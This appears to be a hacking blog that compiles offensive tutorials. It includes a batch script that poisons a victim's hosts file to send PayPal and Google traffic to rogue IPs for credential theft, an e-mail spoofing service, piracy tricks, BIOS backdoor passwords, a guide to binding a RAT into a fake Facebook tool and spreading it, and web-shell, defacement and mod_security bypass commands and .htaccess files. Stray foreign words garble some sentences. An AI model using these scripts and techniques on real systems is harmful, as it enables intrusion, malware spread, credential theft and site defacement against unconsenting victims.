How To Do Dns Poisoning Attack (◕_◕)



DNS Poisoning Attack (◕_◕)


What is DNS Poisoning


Cache poisoning, also called domain name system (DNS) poisoning or DNS cache poisoning, is the corruption of an Internet server's domain name system table by replacing an Internet address with that of another, rogue address. When a Web user seeks the page with that address, the request is redirected by the rogue entry in the table to a different address. At that point, a wormspyware, Web browser hijacking program, or other malware can be downloaded to the user's computer from the rogue location.
Cache poisoning can be transmitted in a variety of ways, increasing the rate at which rogue programs are spread. One tactic is the placement of compromised URLs within spam e-mail messages having subject lines that tempt users to open the message (for example, "Serious error in your tax return"). Images and banner ads within e-mail messages can also be vehicles by which users are directed to servers that have been compromised by cache poisoning. Once an end user's computer has been infected with the nefarious code, all future requests by that user's computer for the compromised URL will be redirected to the bad IP address -- even if the "victim" server resolves the duduk kasus at its site. Cache poisoning is particularly dangerous when the targets are well-known and trusted sites, such as those to which browsers are pointed when automatic virus-definition updates are performed.

In simple words it's just an awesome attack try it you will really like it.

1. Just open up a notepad, copy and paste the below code
 
@echo off
echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit
 
2. Save it as a batch file with the extension .bat
 
3. Then run it on the Victims computer to infect it.
 
4. This aktivitas creates a new entry in the hosts file, so that whenever an user attempts to move to www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise if the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes. 

How To Do E-Mail Spoofing Without Making It Spam



E-mail Spoofing is very Easy, But Spoofing E-mail without making it spam is really very hard
It was being a small challenge for me !! But nowadays PHP is one of the best way to spoof E-mails without making it spam, So I just found a new way How to Spoof E-mails 100 % undetectable by any Spam detector.............So let's start now

What is E-mail Spoofing ?
E-mail Spoofing is a fake connection of mails that can be Spoofed to mail fake Mails for eg. An ATTACKER can send mails to any E-mail ID without Logging to victim's ID or the Spoofer ID, & an attacker can STEAL victim's Personal data or information

Here is one example How can an Attacker send you mails with any E-mail ID, without making it's Spam

Let's take 3 E-mail ID for Test

Now Suppose if u wanna send mail to Kevin from Mac ID so you can use many types of FAKE MAIL SENDER OR ANONYMOUS E-MAIL SENDER, But all this services is spam, So i just created a PHP file that can send any mail to any E-mail ID without logging to any a/c, NOTE This service is not detected Spam yet ...
So if you wanna send mails from Mac E-mail ID to your victim's E-mail ID, without logging in to Mac ID, & 100 % FUD (Fully Undectable) by spam detector it is called as a E-mail Spoofing 100 % FUD

You can send mails to Kevin, from Mac & the main thing is if suppose victim's replies to your mail ?? so in whom E-mail ID it goes, It goes in Attacker E-mail ID
I mean viv_7@yahoo.com................
So to do Spoofing Attack Go on my PHP page & friends do not Explode this trick much !! This is my PHP Page to Spoof E-mail's without making it Spam
E-mail Spoofing Chart


How To Do ?
First of all go to my Unknown E-mail Spoofer it is free, but you have to wait for 5 seconds to skip Ads
CLICK HERE TO GO ON SPOOFING PAGE

You can also make your own Spoofing server by uploading the PHP file if you want PHP file and Script then mail me on this viv_7@ymail.com. & host it on free web hosting sites ;).

Step 1



STEP 2




















NOTE THIS IS FOR EDUCATIONAL PURPOSE ONLY !!  I M NOT RESPONSIBLE FOR ANY SPOOFING DID BY ANY READERS !!

Hack To Find Any Software Serial Key


Ok, this is a little trick that i usually use to find cd keys with Google.
If you‘re looking for a serial number for Nero (for example) go to google.com and type Nero 94FBR and it'll bring it up this works great in Google.

HOW DOES THIS WORK?

Quite simple really.
94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro.
By searching for the product name and 94fbr, you guarantee two things.
1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for. 2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee

5 Things A Beginner Hacker Should Know Before Hack


Here are few points for beginners which they should know :-)



  1. At this stage, most of the students search for hacking tools and software. But Here i want to make this clear that no tool and software exists which can hack Gmail, Facebook, Yahoo, twitter or any aother website or email account in just few clicks. These types of posts on internet are just for attracting visits and spread spams. Most of this type of hacking tools are binded with trojans which leads your system at risk. The recent example it Anonymous LOIC tool which is used to hack members to use their system in criminal activities.

  2. Never use any premium keylogger which is available free on filehosting websites.Hackers always host this type of tool with Trojans. After installing this type of keyloggers you will be hacked

  3. Never pay for hacking on the websites which are asking money in return of hacking. If you want to pay for any hacking book, tool or other kit, pay only on the trusted websites. 

  4. Join any good hacking lembaga and learn new things from the experts. Never follow a person just for his claims. Always follow a person who has real knowledge. Adding hacker word is not going to make anyone hacker. There are many Javascript pranks and online websites are available which are used to create fake screenshot and defacing pages. These are used by many noobs to create some fake hacking screenshot to share on Facebook. And beginners follow them thinking as a hacker.

  5. Learn Programming languages and networking. These are must to be a hacker. Most of the hacking attacks such as SQL injection, PHP injection, XSS, Phising and many other needs the knowledge of programming. 

How To Bypass Bios Passwords







BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT depart
ment. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER
This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.

Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS

Use password cracking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.

--------------------------------------------------------------------------------

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name merk laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222
589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot

--------------------------------------------------------------------------------

Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS direktur password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1
!BIOS (get the how-to article)
RemPass
KILLCMOS

--------------------------------------------------------------------------------

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.
Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.

--------------------------------------------------------------------------------

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.
Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.

--------------------------------------------------------------------------------

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.

--------------------------------------------------------------------------------

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.

--------------------------------------------------------------------------------

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

Temple Run 2 Cheats!!!



Well recently Imangi Studios released their Temple Run 2 Cheats!!!
Temple Run 2 Cheats  Well recently Imangi Studios released their Temple Run 2 for Android And IOS Devices  successor of the earlier version and with no doubt it has become the best game ruling the entire season and rocking the app store. Well people are always in search for some free upgrades making their gaming experience much more faster and easier. As always people or being precise mobile zone hackers came up with another easy tweak to get unlimited power ups and upgrades for free in Temple Run 2.
Well with this tweak you can easily gain unlimited coins and gems making your powers ups much more easier and faster. Well you can easily get this tweak working on Android or iOS devices by following below tutorial.

Things you will need For Android ?

  1. Gamedata.txt file.
  2. A simple File Explorer (ES File Explorer)

For Android Devices

Now if you need to get unlimited money and gems in Temple Run 2 running on your Android device you have to little technical work, so follow steps mentioned below and make sure that you have played the game once to get this tweak working.
  1. Get everything mentioned on the right, every file should be on your computer.
  2. Now just transfer that “gamedata.txt” file to your Android device.
  3. Now fire up the File Explorer you have installed and navigate to/sdcard/Android/data/com.imangi.templerun2/files
  4. Now in this folder you will see “gamedata.txt” already present just rename that file to anything like “gamedata.apk” or anything according to your choice.
  5. Now you need to paste the downloaded “gamedata.txt” file right here, so copy it from where you have pasted and then paste it in this folder.
  6. That’s it now your game is tweaked up with unlimited money and gems, so grab few power-ups and upgrades easily.

Things you will need IOS ?

  1. Gamedata.txt file.
  2. IOS Apple DOWNLOAD HERE
    DiskAid tool for exploring iOS device & transferring stuff.

For IOS Devices

So now if you are on iOS devices and want to have this unlimited hack for your Temple Run 2 game, well you even need to do some technical work and this tweak will work. Well the same thing goes fro you too make sure that you have run the game once.
  1. Download everything mentioned on the right side.
  2. Now just open the “DiskAid” software on your computer and connect your iOS device to it, now just click on the Temple Run 2 game icon and paste the “gamedata.txt” file in their.
  3. That’s it now your game is tweaked for unlimited coins, gems and money for getting those awesome power-ups.
  4. Well we even have a video that explains the whole procedure by demonstrating live, so check the below video on how its done and have fun.

Subway Surfer Cheats!!!

Decrypt Hash Wordpress




Well i will share my private method and you will see that it's very easy to crack any wordpress hash ^_^

First Download Passwords Pro ==============>>> Click here

and now the most important thing is to use the following module :  MD5(Unix);phpBB3;Wordpress

Just add the module inside the soft and you don't need to use a wordlist and wait millions of 

years ^_^ the rest depends from your CPU

Enj0y ^_^

Hack Pc Easy


Hello my friends ^_^ today i will introduce you a simple method to hack a pc without trying to scan Ip


of your victim and trying to find a port , well it's simple ^_^ wtf ^_________________________^



First thing we gonna use the best RAT "Unknown Logger" then we gonna bind our server into a Facebook
Software.

okay i uploaded for you all the necessary files here DOWNLOAD 

Files contains:

*The Rat

*A Facebook software wich we gonna use to bind our virus inside it

*Spoofer wich can spoof extension for example change ".exe" to ".jpg"


ok let's start ^_^ but before opening any files you can scan the files online to be sure that i'm not here
for hacking people or something i'm just sharing knowledge ^_^

ok open the RAT and follow the pictures:



After that click on Build then yo gonna find your server in the folder "Mauritania" don't execute it ^_^

you are not going to hack yourself ^_^. Now we gonna bind our server with that Facebook Soft

so we can fool our Victims , that soft works perfectly it recovers logins facebook stored in your pc ^_^

If u want your server as an image just use that spoofer to change the extension to ".jpg" any extension

you want.

Now how to bind your server inside that soft very easy you have already the tool in your pc ^_^

Just go to cmd and type :

iexpress and click enter a pop up will open see the image:

How to use Iexpress Binder???


1. Go to Start ->Run and type- iexpress and hit on OK.

2. You will get something like this:


3. Hit on Next twice. In “Package Title”, enter the name of the software with which you are going to bind your keylogger server. I am binding my Cybergate server with Ultrasurf. So, I’ll enter Ultrasurf.

4. In Confirmation Prompt, hit on “Prompt User with” and enter something like this:

“Windows will install necessary files. Please disable your Antivirus before further installation proceeds.”

So, whenever victim will run our binded file, he will get a message alert to disable his antivirus. This step helps us in bypassing antivirus detection.

Hit on Next twice.

5. You will come to “Packaged files” interface. Hit on Add and select the two files you want to bind. Hit on Next.

6. Now, this one is important. In Install Program to Launch pane, select the files as mentioned:


Install Program: Select your server file.

Post Install Command: Select your software (.exe file) with which you are gonna bind the server.

7. Hit on Next and select “Hidden”. Click on Next twice.

8. In Package Name And Options, hit on Browse and select the path where you want to save the binded file. Also, check “Hide File Extracting Animation from User” and hit on Next.

9. In Configure Restart, select “No Restart” and hit on Next. In Save Self Extraction Directive, select “Don’t save” and hit on Next twice. Iexpress will start binding file for you. Finally, hit on Finish to complete the binding process.



Now how to spread you server just make many pastebin Docs and upload it on many Websites

Like Mediafire , Zippyshare , etc.... Choose your own way ^_^


Author: Mauritania Attacker
Source: Mauritania HaCker Team

Pro Sql Injection


Hello my friends today i will show you the best method to exploit sql injection ^_^


as you know we all know Havij , Sql map , Webcruiser , etc..... you can also exploit sql injection with hackbar or manually.

The best Software that have some private features is Pangolin Created By Chinese Hackers long time

i did many research from Google to find the pro version but no one could crack it so i decided to

crack it ^_^ and i could success to crack without any error ^_^


you can check the website of the company  http://nosec.org/en/productservice/pangolin/

and you can't find it cracked , just do a research on Google ^_^ all versions you can find that says

Cracked are fake and binded with a server ^_^ Enj0y ;)


DOWNLOAD


Author: Mauritania Attacker
Source: Mauritania HaCker Team

Bypass Index Joomla



Hello my friends , many hackers find a big masalah when they upload shell on a joomla website and the permission doesn't allow to edit files like "index.php"




Well i will show you how to bypass the permission !!!!

First thing upload a perl script or python or cgi like you want.

then go to the direction where you want to edit (deface) your file like this:

cd /home/user/public_html/

Then type this command :

echo 'put here your deface code' > /home/user/public_html/index.php


Mauritania Attacker.

Bypass Server Security 100%


Hello my friendz , today i will explain you how to bypass the security of the any server 100%




First thing if you can't use python , perl or cgi script to execute commands after giving to the script CHMOD 0755 the solution is to upload this variable php and edit it with the name of the file that you want to execute
exemple of a file: "perl.pl"


CODE:


<?
chmod("perl.pl" , 0755);
?>

Then save this file as ".php" extension.

 If the host is very secured and you can't read directories or upload a file or edit a file just use this ".htaccess"

CODE:


<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine Off
</IfModule>


Remember if perl don't work with the variable php just use this ".htaccess"


CODE:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .pl

AddHandler cgi-script .pl
AddHandler cgi-script .pl



For Python also same but change ".pl" to ".py" for cgi script use this ".htaccess"


CODE:


Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root

AddHandler cgi-script .root
AddHandler cgi-script .root




If you want to Bypass Uploads Options and upload shell in another extension use this ".htaccess" :

CODE:

<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>


For more Information check some old pastebin i posted ^_^

http://pastebin.com/NapunGnJ

http://pastebin.com/VJQN4AvF

You can find many if you search in Google Enj0y ;)


Mauritania Attacker.

Bypass Litespeed Symlink



Hello my friendz , many people asked me how to bypass symlink in Litespeed ???
well i will explain a method that can bypass 90% of Litespeed servers.


code php: ls -la /etc/valiases/fbi.gov


code php:


test.shtml 

ln -/home/user/public_html/configuration.php test.shtml



.htaccess code:


Options +FollowSymLinks
DirectoryIndex seees
.html
RemoveHandler 
.php
AddType application
/octet-stream .php  




Mauritania Attacker.

Bypass Uploading Shell In Joomla



Hello my friendz , today i will show you how to bypass uploading shell in joomla , we know basic methods for uploading shell in joomla !



*Editing Templates with shell code

*Adding php types in configuration and uploading shell

*Uploading shell sometimes as  .php;.jpg

*Using some components to upload shell

etc..............


Well it's so easy there is a method to upload shell that work 100% , you have just to go to extensions in the panel and upload a rar file inside the rar you have to put your shell as ".php" example shell.php then go totmp folder and add your shell so it will look like this:

www.site.com/tmp/shell.php

Enjoy ;)

Search

Blog Archive